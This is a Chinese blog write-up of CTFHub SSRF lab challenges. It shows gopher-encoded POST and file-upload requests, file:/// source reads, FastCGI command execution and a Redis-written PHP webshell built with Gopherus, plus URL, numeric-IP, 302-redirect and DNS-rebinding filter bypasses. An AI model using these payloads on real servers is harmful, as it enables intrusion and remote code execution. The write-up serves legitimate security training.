CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)

最新推荐文章于 2024-04-26 22:03:48 发布
最新推荐文章于 2024-04-26 22:03:48 发布
阅读量2.6k 收藏 14
点赞数 4
分类专栏: Web安全 CTF 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31710331/article/details/119765578
版权

目录

一、Post请求

二、上传文件

三、FastCGI协议

四、Redis协议

五、几道IP绕过

1.URL Bypass

​2.数字IP Bypass

3. 302跳转 Bypass

 4.DNS重绑定 Bypass

一、Post请求

1.先用伪协议尝试读取index.php和flag.php文件

以下为index.php源代码

再看flag.php里出现了一串奇怪的key,利用curl和gopher协议POST数据到flag.php即可

key=88e24a185b1471ea34764dfb6129c7d7

思路:往index.php里传入我们的payload

 /?url=127.0.0.1:80/index.php?url=gopher://POST包

2.构造post请求

注意项: ①对构造的post包进行三次URL编码,本体一次,传入index一次,跳转到flag一次

②编码第一次后的%0A全部替换成%0D%0A

③content-length为最后一行的长度,即post数据的大小

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=8a6d748f4f820709cd9e444991d49dd0

进行三次编码修改后可得:

POST%252520/flag.php%252520HTTP/1.1%25250D%25250AHost%25253A%252520127.0.0.1%25253A80%25250D%25250AContent-Type%25253A%252520application/x-www-form-urlencoded%25250D%25250AContent-Length%25253A%25252036%25250D%25250A%25250D%25250Akey%25253D88e24a185b1471ea34764dfb6129c7d7

3.发送请求

gopher协议格式:URL:gopher://<host>:<port>/<gopher-path>_后接TCP数据流

?url=127.0.0.1/index.php/?url=gopher://127.0.0.1:80/_POST包

 如图发送数据包即可返回两个HTTP请求(右边两次 200 OK)

注意:要进行两次?url=跳转,第一次转到127.0.0.1/index.php后,再将?url=构造的post包传入index.php后才可成功获取flag,否则返回错误

二、上传文件

 1.构造file伪协议payload查看index.php和flag.php源代码

?url=file:///var/www/html/index.php(flag.php)

发现此题跟上题类似,只是这次需要post上传的是一个文件 

 2.网页中没有提交按钮,修改源代码添加提交按钮

<input type="submit" name="submit">

3.提交文件,并抓包,这个包就是我们要构造的POST包 

 编码左边请求包--->编码一次修改%0A为%0D%0A后,再连续编码两次

 4.构造payload发送请求

?url=127.0.0.1/index.php/?url=gopher://127.0.0.1:80/_POST包

 成功获取flag!

三、FastCGI协议

协议具体介绍和漏洞分析如下链接

Fastcgi协议分析 && PHP-FPM未授权访问漏洞

网上已经有很多利用nc 和exp解题的操作,这里使用Gopherus工具来构造payload

很多教程都是使用 /usr/local/lib/php/PEAR.php

实测发现:/var/www/html/index.php即可使用

1. 直接在gopherus中输入PHP文件后加上命令即可:ls

将得到的payload再次进行URL编码,是协议后面那串进行第二次编码

之后用burp抓包加上gopher协议并发送,返回了ls的结果,并没有发现flag相关文件

 

 2.使用查找命令: find / -name flag*

编码操作如上,发现最后一个文件应该就是要找的flag文件

 3.使用cat命令查看文件

 成功拿到flag!

 附上另一个大佬写的博客,看了很有启发:SSRF 学习之 ctfhub靶场-FastCGI - soapffz's blog

四、Redis协议

浅析Redis中SSRF的利用 - 先知社区 (aliyun.com)---前置知识

此题是利用gopher写入木马文件,执行命令,最后拿到flag

1.构造Redis命令(在这里我使用的是Gopherus工具)

构造一句话代码的Redis命令

2.再次编码并利用gopher协议,burp抓包发送

3.尝试用蚁剑访问shell.php

访问成功并找到flag文件

五、几道IP绕过

常用绕过方法---链接

  • locahost绕过
  • 利用@
  • 进制转换绕过
  • 短网址访问
  • 利用句号:127。0。0。1 >>> 127.0.0.1
  • 利用http://xip.io和xip.name绕过
  • 利用Enclosed alphanumerics绕过

1.URL Bypass

根据提示构造:?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

2.数字IP Bypass

当特定IP数字被过滤时,可以考虑用其他进制代替

  • 例如:127.0.0.1可以转换为:
    • 十六进制 = 0x7F000001
    • 十进制 = 2130706433

 

或者使用localhost代替127.0.0.1也可 

3. 302跳转 Bypass

直接访问flag.php,提示要让我们从?url=127.0.0.1中访问

访问发现该地址被过滤了 

 我们可以用file:///协议看下index.php的源代码

 仅仅过滤了数字,用进制绕过或者localhost绕过皆可成功

 4.DNS重绑定 Bypass

题目附件资料 

这道题可以照搬第三题的方法,查看源代码后尝试用localhost和进制转换来绕过,发现成功

下面是使用DNS绑定攻击,参考文章:CTFHub技能树 Web-SSRF DNS重绑定 Bypass_Senimo-CSDN博客

 理解原理之后,用文章中的链接工具,达到攻击效果

通过rbndr.us dns rebinding service网站设置DNS

SSRF部分到此结束,收获颇多! 

Wkingxc
关注
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-bypass靶场
11-10
sqli-bypass靶场
12306Bypass.zip
04-02
12306Bypass.
ctfhub--ssrf
qq_44418229的博客
06-10 909
ctfhub----ssrf笔记
ctfhub ssrf之上传文件
L_2448570135的博客
03-13 376
CTFHUBssrf中文件上传的题目内容,记录自己遇到的问题
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解⼀个ssrf的挖掘⽅法与⼀个全回显ssrf的利⽤⽅法
CTFHUB- DNS绑定 Bypass(小宇特详解)
小宇的web博客
10-23 1480
CTFHUB- DNS绑定 Bypass 1.用我的理解来说就是,用户访问一个特定的域名,然后这个域名原来是一个正常的ip。但是当域名持有者修改域名对应的ip后,用户再访问这个域名的时候,浏览器以为你一直访问的是一个域名,就会认为很安全。这个是DNS绑定攻击 这个是我的理解 这里可以让用户访问一个域名,然后这个域名在访问127.0.0.1 这里我使用的是文中所写的那个网站 https://lock.cmpxchg8b.com/rebinder.html?tdsourcetag=s_pctim_aioms
CTFHub技能树笔记之SSRF:POST请求、文件上传
weixin_48799157的博客
04-03 7681
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
SSRF详解 基于CTFHub(上篇)
Bossfrank的博客
04-28 1724
本文简要介绍了SSRF服务端请求伪造的原理,并通过CTFHub的实例,介绍SSRF的基本原理、利用方式、绕过思路等。
Ctfhub-POST请求
鸣蜩十四的博客
08-09 3229
在题目中的环境初始链接为:http://challenge-fc6097d3c4b542ee.sandbox.ctfhub.com:10800/?url=_ 我们先用file://协议对index.php页面源码进行读取,http://challenge-fc6097d3c4b542ee.sandbox.ctfhub.com:10800/?url=file:///var/www/html/index.php,然后发现有一个/flag.php的页面,然后同样对其源码进行读取 得到index.php的页面源码如
HTTP 请求方法
weixin_40910372的博客
07-02 434
HTTP 请求方法 根据 HTTP 标准,HTTP 请求可以使用多种请求方法。 HTTP1.0 定义了三种请求方法: GET, POST 和 HEAD方法。 HTTP1.1 新增了五种请求方法:OPTIONS、PUT、PATCH、DELETE、TRACE 和 CONNECT 方法。 序号 方法 描述 1 GET 请求指定的页面信息,并返回实体主体。 2 ...
CTFHub -web-ssrf总结 (除去fastcgiredis)超详细
m0_62879498的博客
02-11 2247
CTFHub -web-ssrf 练习总结 一,内网访问 尝试访问位于127.0.0.1的flag.php吧 所以我们可以直接构建url: /?url=http://127.0.0.1/flag.php 进行访问即可成功 二,为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们先尝试 ?url=http://127.0.0.1/flag.php 发现访问不见 这道题说白了是让我们访问本地计算机的web文件 所以我们使用 file 协议读取构造: /url=file:///var/ww
漏扫工具推荐-Invicti-Professional-v23.9
09-28
添加了新的文件上传注入模式。 添加了SSRF(Equinix)漏洞。 添加了Swagger用户界面过期漏洞。 添加了文件上传注入模式。 添加了StackPath CDN已识别的漏洞。 添加了版本1 GUID的不安全使用漏洞。 添加了...
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#[email protected]:80/ http://127.88.23.245:22/+&@google.com:80#[email protected]:80/ ...
ssrf-req-filter:在 NodeJS 中发送请求时防止 SSRF 的模块。 阻止对本地和私有 IP 地址的请求
05-31
ssrf-req-filter - 防止 SSRF 攻击 :shield: 服务器端请求伪造 (SSRF) SSRF 是一种攻击媒介,它滥用应用程序与内部/外部网络或机器本身进行交互。 此向量的促成因素之一是 URL 处理不当。 安装 npm install ssrf-...
Python-GitLab1147SSRF配合redis远程执行代码
08-10
GitLab 11.4.7 SSRF配合redis远程执行代码
开发技术-硬件-SSRF前端挡光元件设计中的若干力学问.zip
04-09
开发技术-硬件
【网络安全安全事件管理处置 — 安全事件处置思路指导
最新发布
享你所想
04-26 670
一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集 二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复 三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复 四、处理复合型安全事件 1.建议
网络安全与密码学--AES加密
weixin_61074128的博客
04-22 835
1997年 NIST征集AES(Advanced Encryption Standard)2000年选中。AES分组长度为128位,密钥长度为128 192 256位。密钥长度 64位(实际使用56位 其中8位是奇偶校验位)python实现AES加密。分组加密之AES加密算法。DES 1977年被采用。
网络安全之弱口令与命令爆破(上篇)(技术进阶)
weixin_70911257的博客
04-25 1384
小小狗蛋可笑可笑
CTFHUB SSRF文件上传
07-28
根据提供的引用内容,CTFHUB SSRF文件上传是指通过SSRF漏洞实现对目标服务器进行文件上传的攻击。在文件上传过程中,攻击者可以构造恶意请求,将文件上传到目标服务器上。具体的攻击方法可以使用常见的绕过技巧,如利用特殊字符、绕过短网址、利用特殊编码等。\[3\]同时,攻击者还可以通过修改请求头中的Content-Length字段来伪造文件大小,绕过服务器的文件上传限制。\[1\]\[2\]需要注意的是,CTFHUB SSRF文件上传是一种安全漏洞攻击,严禁在未授权的情况下进行此类行为,违法者将承担法律责任。 #### 引用[.reference_title] - *1* *2* *3* [CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS绑定 Bypass)](https://blog.csdn.net/qq_31710331/article/details/119765578)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值